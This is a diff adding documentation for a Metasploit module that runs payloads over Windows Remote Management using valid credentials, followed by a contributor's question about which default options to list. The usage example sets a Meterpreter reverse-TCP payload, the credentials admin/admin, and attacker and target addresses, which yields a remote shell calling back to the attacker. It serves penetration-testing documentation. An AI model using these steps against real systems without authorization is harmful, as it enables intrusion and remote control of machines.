documentation/modules/exploit/winrm/winrm_script_exec.md

```diff
@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol).   This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.
+IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. 
+[EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/
+    
+
+
+## Example Usage
+
+```
+msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
+msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(winrm_script_exec) > set USERNAME admin
+USERNAME => admin
+msf exploit(winrm_script_exec) > set PASSWORD admin
+PASSWORD => admin
+msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
+LHOST => 192.168.198.138
+msf exploit(winrm_script_exec) > set LPORT 4444
+LPORT => 4444
+msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
+RHOST => 192.168.198.130
+msf exploit(winrm_script_exec) > show options
```

Comment:
There are some default configurations given in the 'show options' which I have not added like the URI, SRVPORT etc., Should I remove it still?